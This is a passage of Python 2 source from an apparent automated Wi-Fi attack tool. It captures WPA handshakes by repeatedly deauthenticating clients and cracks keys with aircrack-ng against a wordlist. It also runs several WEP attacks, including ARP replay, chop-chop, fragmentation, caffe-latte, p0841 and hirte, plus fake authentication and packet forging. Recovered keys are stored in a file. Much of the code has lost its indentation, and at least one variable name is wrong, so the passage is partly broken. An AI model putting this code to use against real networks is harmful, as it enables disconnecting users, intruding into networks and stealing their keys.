        # Setting deauthentication process here to avoid errors later on
        proc_deauth = None
        print ' %s starting %swpa handshake capture%s on "%s"' % \
              (GR+sec_to_hms(WPA_ATTACK_TIMEOUT)+W, G, W, G+target.ssid+W)
        got_handshake = False
        seconds_running = 0
        target_clients = clients[:]
        client_index = -1
        # Deauth and check-for-handshake loop
        while not got_handshake and (WPA_ATTACK_TIMEOUT <= 0 or seconds_running < WPA_ATTACK_TIMEOUT):
            time.sleep(1)
            seconds_running += 1
            print "                                                          \r",
            print ' %s listening for handshake...\r' % \
                  (GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W),
            stdout.flush()
            # every WPA_DEAUTH_TIMEOUT seconds, fire another round of deauths
            if seconds_running % WPA_DEAUTH_TIMEOUT == 0:
                # Send deauth packets via aireplay-ng
                cmd = ['aireplay-ng',
                       '-0', # Attack method (Deauthentication)
                       '1',  # Number of packets to send
                       '-a', target.bssid]
                # cycle through known clients, then fall back to broadcast
                client_index += 1
                # NOTE(review): client_index can never be -1 here (it was just
                # incremented from >= -1), so that first operand is dead code.
                if client_index == -1 or len(target_clients) == 0 or client_index >= len(target_clients):
                    print " %s sending 1 deauth to %s*broadcast*%s..." % \
                          (GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, G, W),
                    client_index = -1
                else:
                    print " %s sending 1 deauth to %s... " % \
                          (GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, \
                          G+target_clients[client_index].bssid+W),
                    cmd.append('-h')
                    cmd.append(target_clients[client_index].bssid)
                cmd.append(iface)
                stdout.flush()
                # Send deauth packets via aireplay, wait for them to complete.
                proc_deauth = Popen(cmd, stdout=DN, stderr=DN)
                proc_deauth.wait()
                print "sent\r",
                stdout.flush()
            # Copy current dump file for consistency
            if not os.path.exists(temp + 'wpa-01.cap'): continue
            copy(temp + 'wpa-01.cap', temp + 'wpa-01.cap.temp')
            # Save copy of cap file (for debugging)
            #remove_file('/root/new/wpa-01.cap')
            #copy(temp + 'wpa-01.cap', '/root/new/wpa-01.cap')
            # Check for handshake
            if has_handshake(target, temp + 'wpa-01.cap.temp'):
                got_handshake = True
                try: os.mkdir(WPA_HANDSHAKE_DIR + os.sep)
                except OSError: pass
                # Kill the airodump and aireplay processes
                send_interrupt(proc_read)
                send_interrupt(proc_deauth)
                # Save a copy of the handshake
                rename(temp + 'wpa-01.cap.temp', save_as)
                print '\n %s %shandshake captured%s! saved as "%s"' % (GR+sec_to_hms(seconds_running)+W, G, W, G+save_as+W)
                WPA_FINDINGS.append('%s (%s) handshake captured' % (target.ssid, target.bssid))
                WPA_FINDINGS.append('saved as %s' % (save_as))
                WPA_FINDINGS.append('')
                # Strip handshake if needed
                if WPA_STRIP_HANDSHAKE: strip_handshake(save_as)
                # Add the filename and SSID to the list of 'to-crack'
                # Cracking will be handled after all attacks are finished.
                WPA_CAPS_TO_CRACK.append(CapFile(save_as, target.ssid, target.bssid))
                break # Break out of while loop
            # No handshake yet
            os.remove(temp + 'wpa-01.cap.temp')
            # Check the airodump output file for new clients
            for client in parse_csv(temp + 'wpa-01.csv')[1]:
                if client.station != target.bssid: continue
                new_client = True
                for c in target_clients:
                    if client.bssid == c.bssid:
                        new_client = False
                        break
                if new_client:
                    print " %s %snew client%s found: %s " % \
                          (GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, G, W, \
                          G+client.bssid+W)
                    target_clients.append(client)
        # End of Handshake wait loop.
        if not got_handshake:
            print R+' [0:00:00]'+O+' unable to capture handshake in time'+W
    except KeyboardInterrupt:
        print R+'\n (^C)'+O+' WPA handshake capture interrupted'+W
        if attack_interrupted_prompt():
            remove_airodump_files(temp + 'wpa')
            send_interrupt(proc_read)
            send_interrupt(proc_deauth)
            print ''
            exit_gracefully(0)
    # clean up
    remove_airodump_files(temp + 'wpa')
    send_interrupt(proc_read)
    send_interrupt(proc_deauth)
    return got_handshake
def has_handshake_tshark(target, capfile):
    """
    Uses TShark to check for a handshake.
    Looks for the first four EAPOL messages of a 4-way handshake, in order,
    between the target BSSID and any single client.
    Returns "True" if handshake is found, False otherwise.
    NOTE(review): when tshark is not installed the function falls through
    and implicitly returns None (falsy) -- confirm callers treat that as
    "not found".
    """
    if program_exists('tshark'):
        # Call Tshark to return list of EAPOL packets in cap file.
        cmd = ['tshark',
               '-r', capfile, # Input file
               '-R', 'eapol', # Filter (only EAPOL packets)
               '-n']          # Do not resolve names (MAC vendors)
        proc = Popen(cmd, stdout=PIPE, stderr=DN)
        proc.wait()
        lines = proc.communicate()[0].split('\n')
        # Get list of all clients in cap file
        clients = []
        for line in lines:
            if line.find('appears to have been cut short') != -1 or line.find('Running as user "root"') != -1 or line.strip() == '':
                continue
            # collapse whitespace so the summary columns split cleanly
            while line.startswith(' '): line = line[1:]
            while line.find('  ') != -1: line = line.replace('  ', ' ')
            fields = line.split(' ')
            src = fields[2].lower()
            dst = fields[4].lower()
            # any address exchanging EAPOL with the BSSID is a client
            if src == target.bssid.lower() and clients.count(dst) == 0: clients.append(dst)
            elif dst == target.bssid.lower() and clients.count(src) == 0: clients.append(src)
        # Check each client for a handshake
        for client in clients:
            msg_num = 1 # Index of message in 4-way handshake (starts at 1)
            for line in lines:
                if line.find('appears to have been cut short') != -1: continue
                if line.find('Running as user "root"') != -1: continue
                if line.strip() == '': continue
                # Sanitize tshark's output, separate into fields
                while line[0] == ' ': line = line[1:]
                while line.find('  ') != -1: line = line.replace('  ', ' ')
                fields = line.split(' ')
                # Sometimes tshark doesn't display the full header for "Key (msg 3/4)" on the 3rd handshake.
                # This catches this glitch and fixes it.
                if len(fields) < 8:
                    continue
                elif len(fields) == 8:
                    fields.append('(msg')
                    fields.append('3/4)')
                src = fields[2].lower() # Source MAC address
                dst = fields[4].lower() # Destination MAC address
                #msg = fields[9][0]     # The message number (1, 2, 3, or 4)
                msg = fields[-1][0]
                # First, third msgs in 4-way handshake are from the target to client
                if msg_num % 2 == 1 and (src != target.bssid.lower() or dst != client): continue
                # Second, fourth msgs in 4-way handshake are from client to target
                elif msg_num % 2 == 0 and (dst != target.bssid.lower() or src != client): continue
                # The messages must appear in sequential order.
                try:
                    if int(msg) != msg_num: continue
                except ValueError: continue
                msg_num += 1
                # We need the first 4 messages of the 4-way handshake
                # Although aircrack-ng cracks just fine with only 3 of the messages...
                if msg_num >= 4:
                    return True
        return False
def has_handshake_cowpatty(target, capfile, nonstrict=True):
    """
    Uses cowpatty to check for a handshake.
    When 'nonstrict' is set, passes -2 so cowpatty will accept frames
    1, 2, or 3 for the key attack.
    Returns "True" if handshake is found, False otherwise.
    """
    if not program_exists('cowpatty'):
        return False
    # Ask cowpatty (-c) whether the capture holds a usable handshake
    cmd = ['cowpatty',
           '-r', capfile,     # input file
           '-s', target.ssid, # SSID
           '-c']              # Check for handshake
    if nonstrict:
        cmd.append('-2')
    proc = Popen(cmd, stdout=PIPE, stderr=DN)
    proc.wait()
    response = proc.communicate()[0]
    # Any of these messages means cowpatty could not use the capture
    failure_markers = ('incomplete four-way handshake exchange',
                       'Unsupported or unrecognized pcap file.',
                       'Unable to open capture file: Success')
    for marker in failure_markers:
        if marker in response:
            return False
    return True
def has_handshake_pyrit(target, capfile):
    """
    Uses pyrit to check for a handshake.
    Scans 'pyrit analyze' output: once a line names the target AccessPoint
    (matching both ESSID and BSSID), any following handshake line rated
    'good' or 'workable' counts as a valid handshake.
    Returns "True" if handshake is found, False otherwise.
    """
    if not program_exists('pyrit'):
        return False
    # Ask pyrit to "analyze" the capture's handshakes
    proc = Popen(['pyrit', '-r', capfile, 'analyze'], stdout=PIPE, stderr=DN)
    proc.wait()
    inside_target_ap = False
    for line in proc.communicate()[0].split('\n'):
        if not line:
            continue
        if line.find('AccessPoint') != -1:
            # entering a new AP section; is it the one we care about?
            inside_target_ap = (line.find("('" + target.ssid + "')") != -1) and \
                               (line.lower().find(target.bssid.lower()) != -1)
        elif inside_target_ap and \
             (line.find(', good, ') != -1 or line.find(', workable, ') != -1):
            # Pyrit rates this handshake usable for cracking
            return True
    return False
def has_handshake_aircrack(target, capfile):
    """
    Uses aircrack-ng to check for handshake.
    Feeds an empty wordlist on stdin; if aircrack reports
    'Passphrase not in dictionary' it successfully parsed a handshake.
    Returns True if found, False otherwise.
    """
    if not program_exists('aircrack-ng'): return False
    # Build the command as an argument list instead of a shell string so an
    # attacker-controlled BSSID or odd capfile path cannot inject shell code.
    cmd = ['aircrack-ng',
           '-a', '2',          # force WPA mode
           '-w', '-',          # read wordlist from stdin
           '-b', target.bssid,
           capfile]
    proc_crack = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=DN)
    # Equivalent of `echo "" | aircrack-ng ...`: one empty line as the wordlist.
    # communicate() also avoids the wait()-before-read pipe deadlock.
    txt = proc_crack.communicate('\n')[0]
    return (txt.find('Passphrase not in dictionary') != -1)
def has_handshake(target, capfile):
"""
Checks if .cap file contains a handshake.
Returns True if handshake is found, False otherwise.
"""
valid_handshake = True
tried = False
if WPA_HANDSHAKE_TSHARK:
tried = True
valid_handshake = has_handshake_tshark(target, capfile)
if valid_handshake and WPA_HANDSHAKE_COWPATTY:
tried = True
valid_handshake = has_handshake_cowpatty(target, capfile)
# Use CowPatty to check for handshake.
if valid_handshake and WPA_HANDSHAKE_COWPATTY:
tried = True
valid_handshake = has_handshake_cowpatty(target, capfile)
# Check for handshake using Pyrit if applicable
if valid_handshake and WPA_HANDSHAKE_PYRIT:
tried = True
valid_handshake = has_handshake_pyrit(target, capfile)
# Check for handshake using aircrack-ng
if valid_handshake and WPA_HANDSHAKE_AIRCRACK:
tried = True
valid_handshake = has_handshake_aircrack(target, capfile)
if tried: return valid_handshake
print R+' [!]'+O+' unable to check for handshake: all handshake options are disabled!'
exit_gracefully(1)
def strip_handshake(capfile):
"""
Uses Tshark or Pyrit to strip all non-handshake packets from a .cap file
File in location 'capfile' is overwritten!
"""
output_file = capfile
if program_exists('pyrit'):
cmd = ['pyrit',
'-r', capfile,
'-o', output_file,
'strip']
call(cmd,stdout=DN, stderr=DN)
elif program_exists('tshark'):
# strip results with tshark
cmd = ['tshark',
'-r', capfile, # input file
'-R', 'eapol || wlan_mgt.tag.interpretation', # filter
'-w', capfile + '.temp'] # output file
proc_strip = call(cmd, stdout=DN, stderr=DN)
rename(capfile + '.temp', output_file)
else:
print R+" [!]"+O+" unable to strip .cap file: neither pyrit nor tshark were found"+W
def save_cracked(bssid, ssid, key, encryption):
    """
    Appends one cracked access point record to 'cracked.txt'.
    Fields are NUL-separated (chr(0)) so any printable character may
    appear in the SSID or key; load_cracked() reads this format back.
    """
    sep = chr(0)
    record = sep.join([bssid, ssid, key, encryption]) + '\n'
    fout = open('cracked.txt', 'a')
    fout.write(record)
    fout.flush()
    fout.close()
def load_cracked():
    """
    Loads info about cracked access points from 'cracked.txt' into a list
    of Target objects and returns it. Each line holds NUL-separated
    fields written by save_cracked(): bssid, ssid, key, encryption.
    Returns an empty list when the file does not exist.
    """
    cracked_targets = []
    if not os.path.exists('cracked.txt'):
        return cracked_targets
    fin = open('cracked.txt', 'r')
    content = fin.read()
    fin.close()
    for record in content.split('\n'):
        fields = record.split(chr(0))
        # blank or malformed lines won't have all four fields
        if len(fields) <= 3:
            continue
        cracked = Target(fields[0], '', '', '', fields[3], fields[1])
        cracked.key = fields[2]
        cracked_targets.append(cracked)
    return cracked_targets
##########################
# WPA CRACKING FUNCTIONS #
##########################
def wpa_crack(capfile):
    """
    Cracks cap file using aircrack-ng
    This is crude and slow. If people want to crack using pyrit or cowpatty or oclhashcat,
    they can do so manually.
    'capfile' is a CapFile object (filename, ssid, bssid).
    Returns True when the key is cracked, False otherwise.
    Requires the global WPA_DICTIONARY wordlist path to be set.
    """
    if WPA_DICTIONARY == '':
        print R+' [!]'+O+' no WPA dictionary found! use -dict <file> command-line argument'+W
        return False
    print GR+' [0:00:00]'+W+' cracking %s with %s' % (G+capfile.ssid+W, G+'aircrack-ng'+W)
    start_time = time.time()
    cracked = False
    remove_file(temp + 'out.out')
    remove_file(temp + 'wpakey.txt')
    cmd = ['aircrack-ng',
           '-a', '2',                 # WPA crack
           '-w', WPA_DICTIONARY,      # Wordlist
           '-l', temp + 'wpakey.txt', # Save key to file
           '-b', capfile.bssid,       # BSSID of target
           capfile.filename]
    # aircrack's progress output is appended to out.out for polling below
    proc = Popen(cmd, stdout=open(temp + 'out.out', 'a'), stderr=DN)
    try:
        kt  = 0 # Keys tested
        kps = 0 # Keys per second
        while True:
            time.sleep(1)
            if proc.poll() != None: # aircrack stopped
                # aircrack only writes wpakey.txt when the key was found
                if os.path.exists(temp + 'wpakey.txt'):
                    # Cracked
                    inf = open(temp + 'wpakey.txt')
                    key = inf.read().strip()
                    inf.close()
                    WPA_FINDINGS.append('cracked wpa key for "%s" (%s): "%s"' % (G+capfile.ssid+W, G+capfile.bssid+W, C+key+W))
                    WPA_FINDINGS.append('')
                    save_cracked(capfile.bssid, capfile.ssid, key, 'WPA')
                    print GR+'\n [+]'+W+' cracked %s (%s)!' % (G+capfile.ssid+W, G+capfile.bssid+W)
                    print GR+' [+]'+W+' key:    "%s"\n' % (C+key+W)
                    cracked = True
                else:
                    # Did not crack
                    print R+'\n [!]'+R+'crack attempt failed'+O+': passphrase not in dictionary'+W
                break
            # Read the progress aircrack wrote since last poll, then truncate
            # out.out so each iteration only parses fresh lines
            inf = open(temp + 'out.out', 'r')
            lines = inf.read().split('\n')
            inf.close()
            outf = open(temp + 'out.out', 'w')
            outf.close()
            for line in lines:
                # "[...] NNN keys tested" -> keys tested so far
                i = line.find(']')
                j = line.find('keys tested', i)
                if i != -1 and j != -1:
                    kts = line[i+2:j-1]
                    try: kt = int(kts)
                    except ValueError: pass
                # "(NNN.NN k/s)" -> current cracking speed
                i = line.find('(')
                j = line.find('k/s)', i)
                if i != -1 and j != -1:
                    kpss = line[i+1:j-1]
                    try: kps = float(kpss)
                    except ValueError: pass
            print "\r %s %s keys tested (%s%.2f keys/sec%s)   " % \
                  (GR+sec_to_hms(time.time() - start_time)+W, G+add_commas(kt)+W, G, kps, W),
            stdout.flush()
    except KeyboardInterrupt: print R+'\n (^C)'+O+' WPA cracking interrupted'+W
    # make sure aircrack is gone before returning
    send_interrupt(proc)
    try: os.kill(proc.pid, SIGTERM)
    except OSError: pass
    return cracked
def add_commas(n):
    """
    Returns str(n) with commas inserted at every thousands place,
    e.g. 1234567 -> '1,234,567'.
    """
    digits = str(n)
    groups = []
    # peel three digits at a time off the right-hand end
    while len(digits) > 3:
        groups.insert(0, digits[-3:])
        digits = digits[:-3]
    groups.insert(0, digits)
    return ','.join(groups)
#################
# WEP FUNCTIONS #
#################
def attack_wep(iface, target, clients):
"""
Attacks WEP-encrypted network.
Returns True if key was successfully found, False otherwise.
"""
global WEP_TIMEOUT, TARGETS_REMAINING
if WEP_TIMEOUT <= 0: WEP_TIMEOUT = -1
total_attacks = 6 # 4 + (2 if len(clients) > 0 else 0)
if not WEP_ARP_REPLAY: total_attacks -= 1
if not WEP_CHOPCHOP: total_attacks -= 1
if not WEP_FRAGMENT: total_attacks -= 1
if not WEP_CAFFELATTE: total_attacks -= 1
if not WEP_P0841: total_attacks -= 1
if not WEP_HIRTE: total_attacks -= 1
if total_attacks <= 0:
print R+' [!]'+O+' unable to initiate WEP attacks: no attacks are selected!'
return False
remaining_attacks = total_attacks
print ' %s preparing attack "%s" (%s)' % \
(GR+sec_to_hms(WEP_TIMEOUT)+W, G+target.ssid+W, G+target.bssid+W)
interrupted_count = 0
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
# Start airodump process to capture packets
cmd_airodump = ['airodump-ng',
'-w', temp + 'wep', # Output file name (wep-01.cap, wep-01.csv)
'-c', target.channel, # Wireless channel
'--bssid', target.bssid,
iface]
proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN)
proc_aireplay = None
proc_aircrack = None
successful = False # Flag for when attack is successful
started_cracking = False # Flag for when we have started aircrack-ng
client_mac = '' # The client mac we will send packets to/from
total_ivs = 0
ivs = 0
last_ivs = 0
for attack_num in xrange(0, 6):
# Skip disabled attacks
if attack_num == 0 and not WEP_ARP_REPLAY: continue
elif attack_num == 1 and not WEP_CHOPCHOP: continue
elif attack_num == 2 and not WEP_FRAGMENT: continue
elif attack_num == 3 and not WEP_CAFFELATTE: continue
elif attack_num == 4 and not WEP_P0841: continue
elif attack_num == 5 and not WEP_HIRTE: continue
remaining_attacks -= 1
try:
if wep_fake_auth(iface, target, sec_to_hms(WEP_TIMEOUT)):
# Successful fake auth
client_mac = THIS_MAC
elif not WEP_IGNORE_FAKEAUTH:
send_interrupt(proc_aireplay)
send_interrupt(proc_airodump)
print R+' [!]'+O+' unable to fake-authenticate with target'
print R+' [!]'+O+' to skip this speed bump, select "ignore-fake-auth" at command-line'
return False
remove_file(temp + 'arp.cap')
# Generate the aireplay-ng arguments based on attack_num and other params
cmd = get_aireplay_command(iface, attack_num, target, clients, client_mac)
if cmd == '': continue
proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
print '\r %s attacking "%s" via' % (GR+sec_to_hms(WEP_TIMEOUT)+W, G+target.ssid+W),
if attack_num == 0: print G+'arp-replay',
elif attack_num == 1: print G+'chop-chop',
elif attack_num == 2: print G+'fragmentation',
elif attack_num == 3: print G+'caffe-latte',
elif attack_num == 4: print G+'p0841',
elif attack_num == 5: print G+'hirte',
print 'attack'+W
print ' %s captured %s%d%s ivs @ %s iv/sec' % (GR+sec_to_hms(WEP_TIMEOUT)+W, G, total_ivs, W, G+'0'+W),
stdout.flush()
time.sleep(1)
if attack_num == 1:
# Send a deauth packet to broadcast and all clients *just because!*
wep_send_deauths(iface, target, clients)
last_deauth = time.time()
replaying = False
time_started = time.time()
while time.time() - time_started < WEP_TIMEOUT:
# time.sleep(5)
for time_count in xrange(0, 6):
if WEP_TIMEOUT == -1:
current_hms = "[endless]"
else:
current_hms = sec_to_hms(WEP_TIMEOUT - (time.time() - time_started))
print "\r %s\r" % (GR+current_hms+W),
stdout.flush()
time.sleep(1)
# Calculates total seconds remaining
# Check number of IVs captured
csv = parse_csv(temp + 'wep-01.csv')[0]
if len(csv) > 0:
ivs = int(csv[0].data)
print "\r ",
print "\r %s captured %s%d%s ivs @ %s%d%s iv/sec" % \
(GR+current_hms+W, G, total_ivs + ivs, W, G, (ivs - last_ivs) / 5, W),
if ivs - last_ivs == 0 and time.time() - last_deauth > 30:
print "\r %s deauthing to generate packets..." % (GR+current_hms+W),
wep_send_deauths(iface, target, clients)
print "done\r",
last_deauth = time.time()
last_ivs = ivs
stdout.flush()
if total_ivs + ivs >= WEP_CRACK_AT_IVS and not started_cracking:
# Start cracking
cmd = ['aircrack-ng',
'-a', '1',
'-l', temp + 'wepkey.txt']
#temp + 'wep-01.cap']
# Append all .cap files in temp directory (in case we are resuming)
for file in os.listdir(temp):
if file.startswith('wep-') and file.endswith('.cap'):
cmd.append(temp + file)
print "\r %s started %s (%sover %d ivs%s)" % (GR+current_hms+W, G+'cracking'+W, G, WEP_CRACK_AT_IVS, W)
proc_aircrack = Popen(cmd, stdout=DN, stderr=DN)
started_cracking = True
# Check if key has been cracked yet.
if os.path.exists(temp + 'wepkey.txt'):
# Cracked!
infile = open(temp + 'wepkey.txt', 'r')
key = infile.read().replace('\n', '')
infile.close()
print '\n\n %s %s %s (%s)! key: "%s"' % (current_hms, G+'cracked', target.ssid+W, G+target.bssid+W, C+key+W)
WEP_FINDINGS.append('cracked %s (%s), key: "%s"' % (target.ssid, target.bssid, key))
WEP_FINDINGS.append('')
save_cracked(target.bssid, target.ssid, key, 'WEP')
# Kill processes
send_interrupt(proc_airodump)
send_interrupt(proc_aireplay)
try: os.kill(proc_aireplay, SIGTERM)
except: pass
send_interrupt(proc_aircrack)
# Remove files generated by airodump/aireplay/packetforce
time.sleep(0.5)
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
return True
# Check if aireplay is still executing
if proc_aireplay.poll() == None:
if replaying: print ', '+G+'replaying \r'+W,
elif attack_num == 1 or attack_num == 2: print ', waiting for packet \r',
stdout.flush()
continue
# At this point, aireplay has stopped
if attack_num != 1 and attack_num != 2:
print '\r %s attack failed: %saireplay-ng exited unexpectedly%s' % (R+current_hms, O, W)
break # Break out of attack's While loop
# Check for a .XOR file (we expect one when doing chopchop/fragmentation
xor_file = ''
for filename in sorted(os.listdir(temp)):
if filename.lower().endswith('.xor'): xor_file = temp + filename
if xor_file == '':
print '\r %s attack failed: %sunable to generate keystream %s' % (R+current_hms, O, W)
break
remove_file(temp + 'arp.cap')
cmd = ['packetforge-ng',
'-0',
'-a', targets.bssid,
'-h', client_mac,
'-k', '192.168.1.2',
'-l', '192.168.1.100',
'-y', xor_file,
'-w', temp + 'arp.cap',
iface]
proc_pforge = Popen(cmd, stdout=PIPE, stderr=DN)
proc_pforge.wait()
forged_packet = proc_pforge.communicate()[0]
remove_file(xor_file)
if forged_packet == None: result = ''
forged_packet = forged_packet.strip()
if not forged_packet.find('Wrote packet'):
print "\r %s attack failed: unable to forget ARP packet %s" % (R+current_hms+O, w)
break
# We were able to forge a packet, so let's replay it via aireplay-ng
cmd = ['aireplay-ng',
'--arpreplay',
'-b', target.bssid,
'-r', temp + 'arp.cap', # Used the forged ARP packet
'-F', # Select the first packet
iface]
proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
print '\r %s forged %s! %s... ' % (GR+current_hms+W, G+'arp packet'+W, G+'replaying'+W)
replaying = True
# After the attacks, if we are already cracking, wait for the key to be found!
while started_cracking: # ivs > WEP_CRACK_AT_IVS:
time.sleep(5)
# Check number of IVs captured
csv = parse_csv(temp + 'wep-01.csv')[0]
if len(csv) > 0:
ivs = int(csv[0].data)
print GR+" [endless]"+W+" captured %s%d%s ivs, iv/sec: %s%d%s \r" % \
(G, total_ivs + ivs, W, G, (ivs - last_ivs) / 5, W),
last_ivs = ivs
stdout.flush()
# Check if key has been cracked yet.
if os.path.exists(temp + 'wepkey.txt'):
# Cracked!
infile = open(temp + 'wepkey.txt', 'r')
key = infile.read().replace('\n', '')
infile.close()
print GR+'\n\n [endless] %s %s (%s)! key: "%s"' % (G+'cracked', target.ssid+W, G+target.bssid+W, C+key+W)
WEP_FINDINGS.append('cracked %s (%s), key: "%s"' % (target.ssid, target.bssid, key))
WEP_FINDINGS.append('')
save_cracked(target.bssid, target.ssid, key, 'WEP')
# Kill processes
send_interrupt(proc_airodump)
send_interrupt(proc_aireplay)
send_interrupt(proc_aircrack)
# Remove files generated by airodump/aireplay/packetforce
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
return True
# Keyboard interrupt during attack
except KeyboardInterrupt:
print R+'\n (^C)'+O+' WEP attack interrupted\n'+W
send_interrupt(proc_airodump)
if proc_aireplay != None:
send_interrupt(proc_aireplay)
if proc_aircrack != None:
send_interrupt(proc_aircrack)
options = []
selections = []
if remaining_attacks > 0:
options.append('%scontinue%s attacking this target (%d remaining WEP attack%s)' % \
(G, W, (remaining_attacks), 's' if remaining_attacks != 1 else ''))
selections.append(G+'c'+W)
if TARGETS_REMAINING > 0:
options.append('%sskip%s this target, move onto next target (%d remaining target%s)' % \
(O, W, TARGETS_REMAINING, 's' if TARGETS_REMAINING != 1 else ''))
selections.append(O+'s'+W)
options.append('%sexit%s the program completely' % (R, W))
selections.append(R+'e'+W)
if len(options) > 1:
# Ask user what they want to do, Store answer in "response"
print GR+' [+]'+W+' what do you want to do?'
response = ''
while response != 'c' and response != 's' and response != 'e':
for option in options:
print ' %s' % option
response = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % (', '.join(selections))).lower()[0]
else:
response = 'e'
if response == 'e' or response == 's':
# Exit or skip target (either way, stop this attack)
if WEP_SAVE:
# Save packets
save_as = re.sub(r'[^a-zA-Z0-9]', '', target.ssid) + '_' + target.bssid.replace(':', '-') + '.cap'+W
try: rename(temp + 'wep-01.cap', save_as)
except OSError: print R+' [!]'+O+' unable to save capture file!'+W
else: print GR+' [+]'+W+' packet capture '+G+'saved'+W+' to '+G+save_as+W
# Remove files generated by airodump/aireplay/packetforce
for filename in os.listdir('.'):
if filename.startswith('replay_arp-') and filename.endswith('.cap'):
remove_file(filename)
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
print ''
if response == 'e':
exit_gracefully(0)
return
elif response == 'c':
# Continue attacks
# Need to backup temp/wep-01.cap and remove airodump files
i = 2
while os.path.exists(temp + 'wep-' + str(i) + '.cap'):
i += 1
copy(temp + "wep-01.cap", temp + 'wep-' + str(i) + '.cap')
remove_airodump_files(temp + 'wep')
# Need to restart airodump-ng, as it's been interrupted/killed
proc_airodump = Popen(cmd_airodump, stdout=DN, stderr=DN)
# Say we haven't started cracking yet, so we re-start if needed.
started_cracking = False
# Reset IVs counters for proper behavior
total_ivs += ivs
ivs = 0
last_ivs = 0
# Also need to remember to crack "temp/*.cap" instead of just wep-01.cap
pass
if successful:
print GR+'\n [0:00:00]'+W+' attack complete: '+G+'success!'+W
else:
print GR+'\n [0:00:00]'+W+' attack complete: '+R+'failure'+W
send_interrupt(proc_airodump)
if proc_aireplay != None:
send_interrupt(proc_aireplay)
# Remove files generated by airodump/aireplay/packetforce
for filename in os.listdir('.'):
if filename.startswith('replay_arp-') and filename.endswith('.cap'):
remove_file(filename)
remove_airodump_files(temp + 'wep')
remove_file(temp + 'wepkey.txt')
def wep_fake_auth(iface, target, time_to_display):
"""
Attempt to (falsely) authenticate with a WEP access point.
Gives 3 seconds to make each 5 authentication attempts.
Returns True if authentication was successful, False otherwise.
"""
max_wait = 3 # Time, in seconds, to allow each fake authentication
max_attempts = 5 # Number of attempts to make
for fa_index in xrange(1, max_attempts + 1):
print '\r ',
print '\r %s attempting %sfake authentication%s (%d/%d)... ' % \
(GR+time_to_display+W, G, W, fa_index, max_attempts),
stdout.flush()
cmd = ['aireplay-ng',
'-1', '0', # Fake auth, no delay
'-a', target.bssid,
'-T', '1'] # Make 1 attempt
if target.ssid != '':
cmd.append('-e')
cmd.append(target.ssid)
cmd.append(iface)
proc_fakeauth = Popen(cmd, stdout=PIPE, stderr=DN)
started = time.time()
while proc_fakeauth.poll() == None and time.time() - started <= max_wait: pass
if time.time() - started > max_wait:
send_interrupt(proc_fakeauth)
print R+'failed'+W,
stdout.flush()
time.sleep(0.5)
continue
result = proc_fakeauth.communicate()[0].lower()
if result.find('switching to shared key') != -1 or \
result.find('rejects open system'): pass
# TODO Shared Key Authentication (SKA)
if result.find('association successful') != -1:
print G+'success!'+W
return True
print R+'failed'+W,
stdout.flush()
time.sleep(0.5)
continue
print ''
return False
def get_aireplay_command(iface, attack_num, target, clients, client_mac):
    """
    Returns aireplay-ng command line arguments based on parameters.

    attack_num selects the injection technique:
      0 arp-replay, 1 chop-chop, 2 fragmentation, 3 caffe-latte,
      4 p0841 (interactive replay), 5 hirte (cfrag).
    Returns '' when the attack cannot be run (hirte with no clients);
    callers treat '' as "skip this attack".
    """
    cmd = ''
    if attack_num == 0:
        # Classic ARP request replay.
        cmd = ['aireplay-ng',
               '--arpreplay',
               '-b', target.bssid,
               '-x', str(WEP_PPS)]  # Packets per second
        # Prefer the fake-authenticated MAC; otherwise spoof an observed
        # client's address so the AP accepts our frames.
        if client_mac != '':
            cmd.append('-h')
            cmd.append(client_mac)
        elif len(clients) > 0:
            cmd.append('-h')
            cmd.append(clients[0].bssid)
        cmd.append(iface)
    elif attack_num == 1:
        # Korek chop-chop: decrypts a packet one byte at a time.
        cmd = ['aireplay-ng',
               '--chopchop',
               '-b', target.bssid,
               '-x', str(WEP_PPS),  # Packets per second
               '-m', '60',  # Minimum packet length (bytes)
               '-n', '82',  # Maximum packet length
               '-F']        # Automatically choose the first packet
        if client_mac != '':
            cmd.append('-h')
            cmd.append(client_mac)
        elif len(clients) > 0:
            cmd.append('-h')
            cmd.append(clients[0].bssid)
        cmd.append(iface)
    elif attack_num == 2:
        # Fragmentation attack: recovers PRGA keystream from one packet.
        cmd = ['aireplay-ng',
               '--fragment',
               '-b', target.bssid,
               '-x', str(WEP_PPS),  # Packets per second
               '-m', '100',  # Minimum packet length (bytes)
               '-F']         # Automatically choose the first packet
        if client_mac != '':
            cmd.append('-h')
            cmd.append(client_mac)
        elif len(clients) > 0:
            cmd.append('-h')
            cmd.append(clients[0].bssid)
        cmd.append(iface)
    elif attack_num == 3:
        # Caffe-latte: attacks a client rather than the AP.
        cmd = ['aireplay-ng',
               '--caffe-latte',
               '-b', target.bssid]
        if len(clients) > 0:
            cmd.append('-h')
            cmd.append(clients[0].bssid)
        cmd.append(iface)
    elif attack_num == 4:
        # p0841: interactive replay of broadcast ToDS frames.
        cmd = ['aireplay-ng',
               '--interactive',
               '-b', target.bssid,
               '-c', 'ff:ff:ff:ff:ff:ff',
               '-t', '1',  # Only select packets with ToDS bit set
               '-x', str(WEP_PPS),  # Packets per second
               '-F',  # Automatically choose the first packet
               '-p', '0841']
        cmd.append(iface)
    elif attack_num == 5:
        # Hirte (cfrag) requires at least one associated client.
        if len(clients) == 0:
            print R+' [0:00:00] unable to carry out hirte attack: '+O+'no clients'
            return ''
        cmd = ['aireplay-ng',
               '--cfrag',
               '-h', clients[0].bssid,
               iface]
    return cmd
def wep_send_deauths(iface, target, clients):
    """
    Send one deauthentication frame to broadcast, then one to each
    associated client, using `aireplay-ng --deauth`.
    """
    # First entry carries no '-h' option -> broadcast deauth;
    # the remaining entries target individual client stations.
    station_opts = [[]]
    for station in clients:
        station_opts.append(['-h', station.bssid])
    for extra in station_opts:
        cmd = ['aireplay-ng',
               '--deauth', '1',
               '-a', target.bssid] + extra + [iface]
        call(cmd, stdout=DN, stderr=DN)
#################
